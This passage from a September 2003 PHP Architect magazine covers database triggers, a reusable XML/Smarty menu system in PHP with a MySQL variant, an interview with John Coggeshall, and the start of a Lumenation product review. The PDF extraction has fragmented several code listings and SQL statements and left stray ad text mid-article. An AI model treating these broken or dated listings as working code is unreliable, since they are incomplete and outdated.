and updates in separate tables and then transfer them to the actual data tables, checking if all updates were OK. Procedures and Functions Procedures, functions, or stored procedures – they are all essentially the same thing: blocks of code (using some supported language, such as SQL, PL/SQL, C, Java, and recently PHP!) that are executed on the database server. Procedures that run on the database server have many uses, including embedding business logic in the database, data consistency checking, and simplification of the database access interface. Let’s look at an example. Consider that instead of customer updates or deletes, we now have the need to add a new customer into the database. Among other data, we must provide a unique ID value to identify the customer. A PHP function to store new customer data into the database could look something like Listing 6. Notice that we do not receive CUSTOMER_ID as a parameter to the function. Instead, we retrieve the highest existing value from the CUSTOMER table and add one to it. But, what if just between when we got the last ID and inserted our new record, someone else got the same ID and tried to insert the data in the same time? One of us would receive an error and no data would be inserted! Procedures can offer a good solution to this problem, as they are executed very quickly, and may be executed serially on your system. This means that we can use them to “get around” the aforementioned race condition, or at least narrow the window. Truly patching this race condition would usually require table locking, which may be the subject of a future article. As the code for writing database procedures is often very specific for each database system, we will skip writing a real example, point you to some pseudo code in Listing 7, and ask you to consult your local database system manual. Triggers Triggers are usually functions in disguise, linked to a specific table, and executed before or after events like inserting, updating or deleting records. There can often be more than one trigger attached to a single table, and triggers are then executed in specified order, one-by-one. The most common use of triggers is for maintaining referential integrity. Triggers specified before an action can often choose to prevent the action, or perform other actions on other tables
September 2003
●
PHP Architect
●
www.phparch.com
(like deleting matching records, in the case of cascade). Triggers can also change values in the row being modified. This will help us in our next example. Rather than having to run a query to find out what ID we can use, then inserting another row, wouldn’t it be much nicer to just insert the row and let the system worry about giving it an ID? This is exactly how Listing 8 works. Listing 8 shows a trigger on the CUSTOMER table, to be fired right before the row is inserted. The body of the trigger (who’s real implementation would vary greatly on different systems) gets the next ID, and sets the CUSTOMER_ID field in the inserted row. This way, adding a new row is as simple as inserting the data, not worrying about which ID to use. Again, we have to worry about a race condition, but this could be handled with table locks or sequences – topics for another day. Wrapping up There are a number of advanced features that we haven’t covered here, including table locking, row locking, sequences, rules, etc. Perhaps these can be the topics for another article. The more tasks the database server can do for your application, the less code you will have to write. Stability, security, and performance are also a consideration. Generally speaking, features embedded in the server are going to be much more robust and reliable than any simulation we can make. As database systems are improved, more automated features will likely be engineered and introduced, allowing us to focus on the more important things. You might think that you should search out the database with all of these features, and be set for the future, but that’s not necessarily true. Most of the above features come at a cost, and usually it’s performance. If you don’t anticipate a need for these more advanced capabilities, you may see much better performance with a less advanced system.
About the Author
?>
Davor Pleskina lives in Opatijia, Croatia. He is the author of Davor's PHP Editor. You can reach Davor at [email protected].
Click HERE To Discuss This Article http://forums.phparch.com/46 34
Creating a Reusable Menu System with XML and PHP
F E A T U R E
by Leon Vismer
Introduction Over the last few months we have seen some thought-provoking articles on technologies like XML and the Smarty template engine. Other articles have indirectly expressed the advantages of using OOP (Object-oriented programming) instead of procedural programming. In this article we will like to focus on combining the knowledge from these previous gems to build something useful every web developer can use. Every modern Internet or intranet web application these days require some sort of menu structure or interface to allow for the easy navigation within the application. Let’s use the aforementioned technologies to build a reusable menu structure. This menu structure will make use of object-oriented concepts, be defined in XML, and be driven by templates/styles to allow changes to the look and feel. Before we start Firstly, let’s quickly get the logistical things out of the way. To make sure that everything runs smoothly on your side you are going to need the Expat XML library and the Smarty template engine installed. Most Linux distributions have the Expat library compiled in with PHP package (Debian, Redhat, Mandrake, Suse). You can use the following code to see if Expat has been included in your PHP package:
September 2003
●
PHP Architect
●
www.phparch.com
You should see a section ‘xml’ with ‘XML support active’ and the ‘EXPAT Version’ as shown in Figure 1. If you do not have Expat support you can get the source from http://sourceforge.net/projects/expat/. To include Expat support within PHP simply include —withxml when running the configure build script from the PHP source directory. However it is highly unlikely that you will not have Expat support. The Smarty template engine is downloadable Figure 1 xml XML Support
active
XML Namespace Support
active
EXPAT Version
expat_1.95.6
REQUIREMENTS PHP: 4.2+, XML extension, MySQL OS: N/A Applications: Smarty Code Directory: xml_menus
35
FEATURES
Creating a Reusable Menu System with XML and PHP
from http://smarty.php.net and the latest version as of this writing is version 2.50. Why use Smarty? First of all, reinventing a well-invented wheel is seldom necessary. Second, it is almost always advisable to separate the business logic from the presentation layer, and Smarty does a good job of that. You will need to uncompress the Smarty source code into a PHP accessible directory. In my code distribution, I include a code/class.MySmarty.php wrapper file (we will discuss this later) that includes the Smarty template engine as: require_once(‘smarty/Smarty.class.php’);
You might need to change this require statement to point to the correct location of Smarty. The source code for this article contains a ‘code’ directory that should be moved into a web-accessible area on your local machine in order to make the examples work. In this article I presume that you know some basics about XML, Object-oriented programming and using the Smarty template engine. In the same breath, however, I would also like to use this article to introduce some of these concepts. I hope you enjoy the ride! Our requirements Lets have a look at what we would like to see in Listing 1: menu_example_1.xml <menu> php|a <state>closed <section id=”Company Management”> Add a new companyaction.php?function=add_companyDelete a companyaction.php?function=del_company <section id=”User Management”> Add a new useraction.php?function=add_userDelete a useraction.php?function=del_user
our menu component. • We want to store our menu structure in a manageable, portable structure, so we will be using XML to define our menu structure • The menu structure must be able to handle the following: - an optional menu heading - multiple collapsible menu sections - multiple menu items under each menu section - menu items must support an image and or text description • The menu structure needs to support HTML frames, directing access to different windows • The menu needs to support different themes or styles • We need to be able to use our menu as a drop-in component to an existing page or as a standalone menu interface with a separate header and footer to signify a complete HTML page. We will be able to achieve this functionality using our templates. The following is the basic outline of our menu system: menu heading (optional) menu section1 (optional) (click to expand/collapse) menu item menu item menu section2 (optional) (click to expand/collapse) menu item menu item
Mapping what we need into XML Next we need to look at mapping our menu requirements into a XML definition. In Listing 1 (menu_example_1.xml) we see the menu definition starting and ending with <menu> tags. The example menu is typically something we will find in our web administration section. Every menu structure has an optional menu heading and the default state of the menu (either open or closed). The menu structure can have multiple sections with multiple menu items linked to a specific section. Every section has a unique id that identifies the section. We will use this id as the heading/title for the section. Multiple menu items can belong to a section. Every item has an item name to identify the menu item, the item’s
36
FEATURES
Creating a Reusable Menu System with XML and PHP
link, and an optional image for the menu item. In our example, every menu item will be using the arrow.gif image to identify a menu item. How does everything fit together? We will take a slightly different approach here, and show you the end result first. Listing 2 (menu.php) shows how we would like to create our menu. We first create an instance of the Menu class. The Menu class constructor takes two parameters, our menu structure, saved as a xml file, and the style we would like to use for displaying the menu. We then set the default target of the menu items to ‘info’ (an HTML frame). After creating the menu with a call to buildMenu(), we display the menu to screen. Wow five lines of code, that looks easy. I see that hand. Yes, we will be working in a framed environment for this example. Listing 3 (example_1.html) shows the HTML code we will use. For those of us that have itchy fingers, you are welcome to open example_1.html in your browser to see the menu we have just created. You are only allowed to do that, though, if you promise to return. After all, we will need to have a look at how we did that. Figure 2 is a screen shot of the ‘default’ menu style with both sections expanded. (The ‘default’ style’s images and style sheet are included in the article’s source directory). Figure 2
What do we need to continue? Looking at Listing 2, we will explain our project by examining the following: 1. We will first look at a class for parsing our XML menu structure. This class will create Listing 3: example_1.html 1 2 3 Menu Example 1 4 5 9 10
September 2003
●
PHP Architect
●
www.phparch.com
a menu array, containing the structure and information about our menu. 2. Second, we will look at a class to manage the style component of our menu. We will examine our style file (menu.tmp) and the code we use to assign the Smarty variables within our menu template. 3. Third, we will look into the detail of creating collapsible and expandable menu sections and items. 4. Finally, we will end off with the Menu class, tying all of this together. Lets carry on by looking at the XML parser class.
The XML parser On to the real stuff. In our XML class we want to create an array that will hold the contents of our menu structure. Looking at Listing 4 (class.MenuXML.php), we see the MenuXML class with four important class variables. $data
Contains the menu structure we want to parse
$menu
Will contain our menu structure array
$heading
Contains the heading we are using for our menu
$state
Contains the default state of the menu (open or closed)
Our class constructor expects a $data variable. If the $data variable is a valid file location, we read the contents of the file into our $data class variable, else the $data variable is assigned to the class $data variable. By doing it this way, we allow future support where we could create our menu XML structure from a database, choosing not to store the menu structure in a file. We next call the loadXML() method to create our menu array. In our loadXML() method we first load the contents of our menu structure file into a variable. After creating an XML parser, a call to xml_parse_into_struct() parses the XML data into 2 array structures. The $i_ar (index) array contains pointer to the location of the appropriate values in the $d_ar (values) array. After freeing the XML parser we are ready to work with our values array ($d_ar) to construct our menu array. Looping over our values array ($d_ar), we set our heading, state and type class variables. When we encounter a ‘section’ element we get the value of the ‘id’ tag. The ‘id’ tag’s value will be used as a $key for building our menu array. The following code tests our MenuXML class. require_once(‘./class.MenuXML.php’); $xml = new MenuXML(‘./menu_example_1.xml’); echo ‘<pre>’; echo $xml->heading .”\n”; echo $xml->state .”\n”; echo $xml->type .”\n”; print_r($xml->menu); echo ‘’;
Listing 5 shows us the output of the above script, derived from the XML definition in Listing 1 (menu_example_1.xml). Using Smarty and our MenuStyle class As we defined in our requirements, our menu system needs to support themes or styles.
September 2003
●
PHP Architect
●
www.phparch.com
Listing 6 (class.MySmarty.php) is a wrapper class that extends the Smarty class. In our constructor we set the template directory, the config directory, the compile directory and, lastly, a directory where we store extra Smarty plug-ins. If the ‘compile’ directory does not exist, we create it and set the appropriate permissions. (You might need to change this setting if your template directory needs to have world access) Listing 7 (class.MenuStyle.php) contains our MenuStyle class which manages the style or theme of our menu system. The style class currently only works with one Smarty template file, called menu.tmp, stored in the style’s specific directory ‘style/STYLE_NAME/’. Listing 8 is the default menu.tmp style file (style/default/menu.tmp) which we used to build the look and feel in Figure 1. The accompanying source code also includes the style sheet (styles.css). Have a look at the sidebar on Smarty (page 40) if you’re a little rusty or have never ventured that way. As we look at our style class, we will see the Smarty functions assign() and fetch() being used. You should be familiar with the assign() function from the sidebar, but the fetch() function returns our completed template into a variable, instead of directly printing it out. In our style class’ constructor, shown in Listing Listing 5 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
<pre>php|a closed Array ( [Company Management] => Array ( [1] => Array ( [name] => Add a new company [href] => action.php?function=add_company [image] => images/arrow.gif ) [3] => Array ( [name] => Delete a company [href] => action.php?function=del_company [image] => images/arrow.gif ) ) [User Management] => Array ( [6] => Array ( [name] => Add a new user [href] => action.php?function=add_user [image] => images/arrow.gif ) [8] => Array ( [name] => Delete a user [href] => action.php?function=del_user [image] => images/arrow.gif ) ) )
styleDir = ‘styles/’.$style; $this->tmpl = new MySmarty($this->styleDir); } function setHeading($heading) { $this->tmpl->assign(‘heading’, $heading); } function setXML($xml) { $this->tmpl->assign(‘xml’, $xml); } function setSectionURL($url) { $this->tmpl->assign(‘click’, $url); } function getMenu() { return $this->tmpl->fetch(‘menu.tmp’); } }
7, if we parse an empty style, the template style becomes the ‘default’ style and we then set the style directory. Finally, we create an instance of our Smarty class wrapper to work with the appropriate menu.tmp file. The rest of the class contains the following methods that are used to set Smarty variables in our template: • setHeading() A function to set the optional heading to the menu using our menu array variable • setXML() Sets the menu array variable in our template for building our sections and menu items • setSectionURL() Sets the section URL for collapsing and expanding a section • Finally, the getMenu() method returns our completed Smarty menu using the fetch() function. Supporting collapsible and expandable menu sections Another requirement for our menu is to support collapsible sections. In other words, when we click on the ‘section’, the ‘items’ connected to the specific section should collapse or expand. We will be able to achieve this by storing a CGI variable that contains the state of each section. The easiest way to demonstrate this is to show the following HTML that defines our menu from Listing 1. Company ManagementAdd a new company Delete a company User Management Add a new user Delete a user
Wow, this looks like a mouthful! It isn’t really, though. Basically, we only need to look at the ‘section’ part of our menu. We have 2 sections and we store a ‘click’ variable and an ‘m_X’ variable per section. The ‘m_0’ and ‘m_1’ variables store the current status of our section, ‘off’ meaning the section is collapsed and ‘on’ meaning the section is expanded. The ‘click’ variable tells us which section we selected and means that we need to change the ‘m_X’ variable from ‘off’ to ‘on’ or ‘on’ to ‘off’ for the particular section. Looking at Figure 2 as our example, will have both ‘m_0’ and ‘m_1’ set to ‘on’.
?>
Putting it all together Listing 9 (class.Menu.php) shows the class for September 2003
●
PHP Architect
●
www.phparch.com
39
FEATURES
Creating a Reusable Menu System with XML and PHP
A Smarty primer eferencing Listing 8 (menu.tmp), this is meant to be a very quick primer on the usage of Smarty. I will try to briefly R explain the Smarty concepts we are using in our menu template. All of the text between curly brackets ( { and } ) in a Smarty template contains code that is interpreted by the Smarty template engine. Let’s look at a little more detail. Variables A variable within Smarty is represented by {$variable_name}. To assign a variable value within a Smarty template we use the assign() function in our PHP script.. As an example, to set the template variable {$heading} to ‘php|a’ we will need the following code:
creating and displaying our menu using all of our previously defined classes. Firstly, we include our MenuXML class and our MenuStyle class for handling the look and feel of our menu. Our Menu class has three important class variables. $data
A file reference or the contents of our menu structure in XML
$style
The menu display style we are using
$xml
A MenuXML object built with the contents of $data
$tmpl->assign(‘heading’, ‘php|a’) Another variable to take note of in our template is {$smarty.get.page} which returns the name of the current script, similar to $SCRIPT_NAME. Counters We define a counter variable within Smarty using the following syntax: {counter start=X print=Boolean} The following code sets up a counter making the start value of the counter -1 and does not print the current counter to the screen. {counter start=-1 print=false} Additional calls within the template to {counter} will print the values 0,1,2,3...X, respectively, seeing as our start value was set to -1. Control Structures In our template we use two control structures. The ‘if’ statement in Smarty has much the same functionality as the if statement in PHP except that the syntax looks like this {if $variable eq ‘php|a’} some html text if the variable matches {else} some html text if the variable does not match {/if} The ‘foreach’ statement is used to loop over an array variable within Smarty. The ‘foreach’ statement sets the ‘from’ field to the array being looped over, the ‘key’ field sets the current array key we are working with, and the ‘item’ field contains the current element variable in the array. As an example, if we had the following array in PHP $php_array = array ( ‘0’ => array ( ‘name’ => ‘surname’ => ‘1’ => array ( ‘name’ => ‘surname’ => );
‘Leon’, ‘Vismer’), ‘Tikvah’, ‘Vismer’)
we could use the ‘foreach’ statement to print out the array as follows {foreach from=$array key=key item=current} Working with {$key}: Name: {$current.name} Surname: {$current.surname} {/foreach} setting the $array value in our Smarty template using $tmpl->assign(‘array’, $php_array); The above Smarty code will create the following output Working with 0: Name: Leon Surname: Vismer Working with 1: Name: Tikvah Surname: Vismer
September 2003
●
PHP Architect
●
www.phparch.com
After checking that the $data and $style variables are OK, we create an instance of our MenuXML class. We then create an instance of our MenuStyle class using the $style variable. In our example, we are using the ‘default’ style, which we know by now will be lying in the style/default/ directory. At this stage, our style only includes one file, menu.tmp, which is a Smarty template that is managed with our MenuStyle class. Finally we set the default target for any HTML links to ‘_top’. Keeping Listing 2 in mind, we will now look at our buildMenu() method, which forms the heart of our Menu class. Using our MenuStyle object, we set the heading of the menu from our menu array, created in MenuXML. We then set the value of the current menu section that has been clicked on. Looping over our menu array, we retrieve the values of the current open and closed sections and set the new ‘on’ or ‘off’ values for ‘m_X’ in our section URL as we continue. Using the $menu_href array, we store the current new values of our section URL to update into our template. We then loop over every menu item within a section and set a flag in our menu array as to whether the item under that section needs to be displayed in our template or not. Here we add the display key to our array with a value of 1 to display the menu item and 0 to hide it. As an example, if we selected the ‘Company Management’ section from our example, our menu array from listing 5 will be changed to the following (notice the extra display key): [1] => Array [name] => Add a new company [href] => action.php?function=add_company [image] => images/arrow.gif [display] => 1 [3] => Array [name] => Delete a company [href] => action.php?function=del_company [image] => images/arrow.gif [display] => 1
40
FEATURES
Creating a Reusable Menu System with XML and PHP
“Every modern Internet or intranet web application these days requires some sort of menu structure or interface ” Using this behaviour for individual menu items within a section, one can later on expand our Menu class to support a privilege system that allows for the display of individual menu items or not. After building our section URL ($click) from the $menu_href array we set this variable in our style. We then do the magic by setting our new menu array in our template. At this stage, it is worth highlighting the Smarty magic from our menu.tmp (Listing 8) for the default style. Most of the Smarty code should at least look slightly familiar by now. We first create a counter with a default value of -1 and choose not to print it. The {counter} variable will be used to define which section we are clicking on within our section URL. The first {foreach} Smarty loop, loops over the specific menu sections and displays the section in Listing 8: menu.tmp 1 2 3 4 5 6
create database menu; grant select, insert, update, delete on menu.* to www@localhost identified by ‘www’; use menu; create table menu_section ( section_id int not null auto_increment, name char(64) not null, PRIMARY KEY(section_id) ); create table menu_item ( item_id int not null auto_increment, section_id int not null, name char(64) not null, href char(64) not null, image char(64) not null, sort int not null, PRIMARY KEY(item_id) ); insert into menu_section values(0, ‘Company Management’); insert into menu_section values(0, ‘User Management’); insert insert insert insert
into into into into
menu_item menu_item menu_item menu_item
values(0, values(0, values(0, values(0,
1, 1, 2, 2,
‘Add a new company’, ‘action.php?function=add_company’, ‘images/arrow.gif’, 1); ‘Delete a company’, ‘action.php?function=del_company’, ‘images/arrow.gif’, 2); ‘Add a new user’, ‘action.php?function=add_user’, ‘images/arrow.gif’, 1); ‘Delete a new user’, ‘action.php?function=del_user’, ‘images/arrow.gif’, 2);
menu item if the display variable in our menu array has been set. In between each ‘foreach’ statement, we build our section and items using the specific HTML. Notice the menu item variables that are set within our item ‘foreach’ loop:
$v.image
Pulls in the menu item image we are using (for our default style all of these images are the same)
$v.href
Contains the item URL
$v.name
The display name of our item URL
Finally, we fetch our Smarty template from the style class to populate our $menu class variable. At last we can display our menu using displayMenu(). Taking it further Some of you might have noticed a shortcoming in our menu interface. What if we need to build a menu from a dynamic source like a database or
Dynamic Web Pages www.dynamicwebpages.de sex could not be better | dynamic web pages - german php.node
LDAP directory? Lets have a look at building the menu from a database. Listing 10 (menu.sql in the sql directory) contains some SQL to create a new database and add the tables needed to manage our menus. The ‘menu_section’ table contains the different Listing 11: mclass.Sql.php 1 host = $host; 15 $this->database = $database; 16 $this->username = $username; 17 $this->password = $password; 18 if ( !empty($host) ) 19 $this->connect(); 20 } 21 22 function connect() 23 { 24 $this->link = mysql_connect($this->host, $this->username, $this->password); 25 mysql_select_db($this->database); 26 } 27 28 function query($query) 29 { 30 $this->result = mysql_query($query, $this->link); 31 } 32 33 function nextRow() 34 { 35 if ( $this->result ) { 36 if ( $this->row = mysql_fetch_assoc($this->result) ) 37 return true; 38 else 39 return false; 40 } 41 } 42 43 function getField($key) 44 { 45 return $this->row[$key]; 46 } 47 } 48 49 ?>
42
FEATURES
Creating a Reusable Menu System with XML and PHP
sections for a menu, while the ‘menu_item’ table contains the ‘section_id’ a menu item belongs to, as well as the item’s name, href, image and sort order. In our menu.sql file we include the SQL needed to create the same menu structure as our original example. We will be using MySQL as the database. You can create the MySQL tables using the following command substituting ROOTPW with the root password for your server. $ mysql -uroot -pROOTPW menu.sql
“Another requirement for our menu is to support collapsible sections.”
Listing 11 (class.Sql.php) is the database abstraction layer we will be using to access our SQL tables. The class is a work in progress, as you might notice, and we have not included any error checking. Adding an independent SQL database class allows us to use MySQL, Oracle or Postgres without having to change our SqlMenu creation class. Our sql class is straightforward, containing the following methods:
Sql()
The constructor sets up the host, database, username and password variables and calls connect.
Connect()
The connect method creates a mysql connection to the database and selects the database in question.
query()
The query method performs our database queries
nextRow()
The nextRow method returns the next result row as an associated array. nextRow can be called multiple times until the result resource returns false.
GetField()
The getField method return the specific column value for a specific column field name.
Listing 13: menu_sql.php The SqlMenu creation class Our dynamic SQL menu creation class, Listing 12 (class.SqlMenu.php) creates a menu from the ‘menu_section’ and ‘menu_item’ SQL tables. Listing 13 (menu_sql.php) shows us almost the exact same code used in Listing 2 for creating our menu from a XML file. The only difference is that we create an instance of the SqlMenu class
instead of the Menu class. SqlMenu extends the Menu class and the following variables need to be parsed: $heading
The heading of our menu
$style
The menu style we are using
$host
The host our database is running on (normally localhost)
$database
The database we are accessing to get to our menu_section and menu_item tables.
$username
The username needed to access the menu database
$password
The password needed to access the menu database
The constructor sets the heading of our menu and creates a new instance of our Sql class to access the menu database. It then calls _buildSqlMenu(). _buildSqlMenu() uses an SQL JOIN statement to retrieve the sections, and items mapped to those sections, from the ‘menu_section’ and ‘menu_item’ tables. We then loop over the result resource and add the section and menu items to a menu array, passing the section name, item name, item href, and item image column values to the _addItem() method. Next the SqlMenu constructor calls the _buildXML() method to create the menu XML structure we need as a variable to our original MenuXML class (class.Menu.php). You might remember that the XML structure can either be in a flat file or, if the file does not exist, defined in a variable. Next, we see the beauty of class
inheritance, where our SqlMenu class constructor calls our Menu class constructor, using our newly created XML menu structure and our $style variable. The rest of the menu_sql.php file is exactly the same as our menu.php example. Figure 3 shows the result of menu_sql.php Figure 3
Conclusion I hope this article has allowed us to see the possibilities of utilizing disparate technologies to create solid, manageable and reusable components in our PHP development.
About the Author
?>
Leon is a developer based in Cresta, South Africa, who specializes in web application development.
Click HERE To Discuss This Article http://forums.phparch.com/47
Have you had your PHP today?
• Subscribe to the PRINT edition • Subscribe to the ELECTRONIC edition
Visit us at http://www.phparch.com and subscribe today. September 2003
●
PHP Architect
●
www.phparch.com
php|architect 44
Speaker on the High Seas An Interview with John Coggeshall
F E A T U R E
by Marco Tabini
ow that we have finally let the php|cruise cat out of the bag, what better way to get you acquainted with the brilliant minds that will be accompanying us during the cruise than to ask them a few questions about their work, their passion for PHP, and a sneak preview of what topics they plan to tackle during their sessions. When we decided to organize php|cruise, one of the first people I turned to for a few talk ideas was well-known author John Coggeshall, who has written on PHP for a number of different technical publications (including, very soon, php|architect). I first met John in person last year at PHPCON in New York City, although we had had a few opportunities to chat on the phone and via IRC on the Internet, and we’ve been in constant touch ever since—we even worked together on a couple of projects, such as our proof-of-concept PHP compilers. It is only fitting, therefore, that for the first in a series of interviews with php|c speakers that we’ll be publishing over the next few months, we turned to John for some good ol’ PHP Q&A.
N
php|a: We’ve heard you’re writing a book on PHP5. Can you give us some details? John Coggeshall: I’m currently working on the PHP Developer’s Handbook published by Sams Publishing due out early next year. The book itself has a strong focus on the practical aspects of PHP programming, with a very strong emphaSeptember 2003
●
PHP Architect
●
www.phparch.com
sis on the new PHP 5 technologies. The book’s goal is to provide not only a reference for these new technologies, but also ways that these technologies can actually be used in practical, dayto-day programming to make development of PHP applications more effective. From the new object model to breakthrough extensions such as SQLite, each is covered in great detail. php|a: Is it hard to keep current with the development of PHP5? JC: It has been quite the challenge for sure, hitting a moving target is never easy. On top of that, one of the unfortunate side effects of open source development is that solid documentation is often an afterthought to the finished product. I’ve devoted more time than I care to admit exploring and working with PHP 5 to ensure the most accurate content I can provide for my book – and I’m a lot more pale because of it! php|a: You’ve also done a lot of work extending PHP, including your Tidy extension and your PHP compiler proof of concept. Where do you think your efforts fit in the grand scheme of things? JC: The PHP Compiler project has been an excellent learning experience when it comes to really understanding the low-level nuts and bolts of the way PHP 5 operates, so I consider it a significant
45
FEATURES
Speaker on the High Seas
project for me, personally. When I first started on the project there were a lot of people who didn’t really think a PHP compiler was feasible at all, and now I see more and more projects popping up that are retracing a lot of my steps and exploring the possibilities. I believe it did a lot to push the envelope of where PHP is heading in the future and I’m very proud of it. Tidy, on the other hand is a much less theoretical project which has generated a lot of interest in the community, since it ties directly into the primary use of PHP as a web scripting language. It is, of course, still a work in progress, but its ability to provide developers with an extremely intuitive way of parsing XHTML/HTML, as well as cleaning, diagnosing, and repairing it, is going to make it a valuable tool for any PHP developer. Developers are tired of trying to use difficult regular expressions to do their HTML processing – and they shouldn’t have to. Tidy will allow developers to extract entire HTML tables, URLs, and more, with only a few lines of intuitive PHP code. To me, personally, that’s quite a valuable tool – which is why I wrote it in the first place! php|a: Going back to PHP5, do you think it will cause PHP to be accepted in new markets and industries? JC: Yes, although it’s not quite clear in what ways these new markets will be influenced by the release of PHP 5. Now that PHP supports a stronger object model, work is being done to more tightly integrate it with other languages such as Java, which can only
add to the appeal of the language as a whole. Also, although it’s been happening for awhile now, more than ever I am witnessing PHP being thought of as more than just a web scripting language, but rather a general-purpose language. Thanks to some very innovative people, it wouldn’t surprise me to see PHP begin to show up in places no one thought possible a year ago.
“Expect to be assaulted with the nuts and bolts...” php|a: Besides the new OOP functionality, what do you think is PHP5’s best new feature? JC: That’s a tough question, there are a ton of features in PHP 5 that are going to be great for developers. If I had to pick one, I think the feature with the greatest impact will be the addition of SQLite to PHP. Data is always a critical piece of any PHPbased application, and until now your choices were to either store data locally in the file system using some sort of difficult custom file format, or require some sort of database server, such as MySQL. SQLite provides a means for developers to use SQL in any PHP script, and have it run on almost any PHP 5 installation without having to have any additional software installed. That’s a
Nobody...
As the publishers of Ian's Loaded Snapshot we know OSCommerce!
Hosts OSCommerce Better!
100's of OSCommerce powered sites rely on our years of experience with OSCommerce, direct
We Guarantee It! PHP, mySQL and Curl Optimized for OSCommerce Free Shared Certificate & Integrated SSL Server 20+ Contributions Pre-Installed on MS1 Release Web Mail and Web Based File Manager Full FTP and phpMyAdmin Access Free Ongoing Hands-On Support Web Stats by Urchin Reports Free Installation and Configuration
USE PROMO CODE: phpa Get an Extended Free Trial and Free Setup! September 2003
●
PHP Architect
●
www.phparch.com
866-994-7377 or [email protected] www.chainreactionweb.com www.chainreactionweb.com/reseller.
46
FEATURES
Speaker on the High Seas
big step for data storage in PHP, and expect a lot of developers to begin replacing those outdated flat-file storage systems with SQLite solutions in the post- PHP 5 world. php|a: Tell us a bit about the sessions you’ll be presenting at php|c. JC: Well, php|c is going to be quite the experience for me – not only am I going on a cruise (how cool is that, really), but I’ll be giving three different sessions while on board. I’ll personally be starting the cruise with a talk on graphics manipulation with PHP, which in my eyes is going to be the most “entertaining” talk to give out of the three. This talk will be covering the entirety of graphics manipulation with PHP which will have use in PHP 4 and PHP 5 alike. When people think of graphics manipulation in PHP, the first thing that comes to mind is, of course, the GD extension. The GD extension is great for drawing geometric shapes, image resizing, and other general-purpose functionality, but lacks in some of the graphics functionality many designers have had for years in products like Adobe Photoshop or GIMP. There are, however, graphics extensions which haven’t received a lot of attention that, at the very least, complement the GD extension. One such extension is imagick, which provides a great deal of functionality otherwise lacking, such as embossing, edge-finding, and other filters. Expect to be assaulted with the nuts and bolts of using both of these extensions during my talk, including some PHP 5-specific graphics tools. I won’t discuss the new PHP 5 technologies here - you’ll just have to come to the talk if you want to learn about those! Along the same thought process as my graphics talk I’ll also be giving a talk on creating the elusive PDF document dynamically with PHP. Effectively creating PDF files with PHP is a difficult task; however, there are a few tricks of the trade which can make it much easier. I’ll start off in this talk with a discussion of some of the basic PDF manipulation functions that will get you started, and then move on to some lesser known functionality and techniques which can help you make the most of your time when creating PDFs from within PHP. By the time the talk
is over, you’ll have some solid, practical tools that will get you from script concept to conception, creating dynamic PDF documents fast and, hopefully, with less of a headache. My final talk during the cruise is going to focus on addressing one of the most important topics in PHP development today – content management. When it comes to web development there are two sides of the coin to a successful web site – the designers and the programmers. Designers often know little about programming, and, if you’ve ever looked at a programmer’s web site, programmer’s generally don’t know very much about design. Ideally, it’d be nice to keep the designers out of the web site application logic (which provides the real functionality), and keep the developers out of the site’s presentation logic (which provides the look and feel). There are countless ways to go about trying to reach this goal, and in this talk I’ll be focusing on one of the most well-thought-out PHP solutions – the Smarty templating engine. Smarty is one of the most unique web template systems that I have ever seen, and, without a doubt, one of the most flexible available in PHP. Surprisingly enough, not many people are very familiar with the product – this talk hopes to correct that. I’ll start off by introducing Smarty by answering the all important question “Why should I care?”, and then start getting into the details of using Smarty effectively within a web site. When it comes to details, expect to be introduced to all of the fundamentals of using Smarty to design web sites, such as template variables, modifiers, functions, caching, filters and plug-ins. The goal of this talk is to take someone who has little or no knowledge of using Smarty and provide them with the necessary tools to begin using it that very day. I think it’ll be a good wrap up, both for me and the conference as a whole.
"I’ll start off by introducing Smarty by answering the all important question 'Why should I care?'"
php|a September 2003
●
PHP Architect
●
www.phparch.com
47
P R O D U C T
R E V I E W
Lumenation and LightBulb Lumen Software ( http://www.lumensoftware.com )
was browsing one day, as I often do, looking for interesting PHP developer products to review, when I stumbled across something called EzSDK (now known as LightBulb). I looked around a little, thinking this was just another application framework. I soon found out that it was much more. It was actually an entire web application development platform. I was intrigued. I contacted Lumen Software for more information, and ended up getting a couple fully-guided web-conference tours of the system. Incidentally, one of these tours was rather suddenly interrupted by my very pregnant wife stating that “We’d better get to the hospital... NOW!” Incredibly, an hour and a half later I held a new son in my arms. Anyway, I digress–back to the system. It turns out that this development platform is even more than that. Not only do you develop applications through it (using the SDK, known as LightBulb), those applications also run within it (using the middleware, known as Lumenation)!
I
What’s the big idea? At its root, the idea is essentially platform independence. The middeware generally runs on Linux servers, which Lumen will provide – preloaded – to customers. Users of the system can run just about any operating system (as long as it supports a Mozilla 1.4+ browser), and experience a familiar desktop environment over the web, from inside their browser. This makes it ideal for September 2003
●
PHP Architect
●
www.phparch.com
legacy networks, such as those found in school districts. Users can log into the system using their very old Apple Macintosh computers, and have virtually the same desktop experience as somebody running the latest P4. Customers are able to leverage the price point and performance of Linux servers running PHP and Apache, while users are able to access their data with a consistent interface from anywhere, at anytime, and with great responsiveness. The system is designed to run over a 28.8K dial-up connection, and performs extremely well. Personally, I’ve used local GUI’s with more latency than Lumenation, and Lumenation runs over the very unpredictable internet. Applications (to run on the virtual desktop, as well as on the web) can be developed very rapidly and with little expertise (using LightBulb), or developed by hand to run on the Lumenation middleware. These applications might be data entry or retrieval systems; they might be large data reporting systems; they might even be something completely funky and other-worldly. Lumenation and LightBulb Lumenation truly is an amazing piece of work. It is a very complete web application, written entirely in PHP, that, among other things, simulates a (very nicely done) desktop environment. Lumenation (the middleware) and LightBulb (the SDK) provide a number of useful functionalities to application developers.
48
Product Review • a simple source code versioning tool • offers hooks into the centrally-administered access control system (on an application level, as well as a data level) • the data dictionary - The data dictionary is a full-featured database manager where you can manage everything to do with your databases. It supports most major database engines, and offers the same sorts of management features as desktop applications. • the application builder - The application builder is where you can very easily and rapidly build data entry, data update, and data viewing systems. This application is impressive; the code it generates is very simple, but the applications it produces are very powerful. • the report builder - The report builder offers the ability to
dynamically build tabulated reports of your data – similar in concept to a reporting tool like Crystal Reports. It can output HTML, CSV, RTF or PHP code, allowing you to embed it in your applications. • the page builder - The page builder is a website development tool. It is similar in concept to Dreamweaver, and has a very cool Object Inspector feature, which allows you to select text and modify all relevant stylesheet properties easily. • support for working with multiple major database engines simultaneously • easy integration of common features, such as spell checking, into your own applications • built-in application use tracking and reporting The benefits for end users are numerous, as well.
Figure 1
September 2003
●
PHP Architect
●
www.phparch.com
49
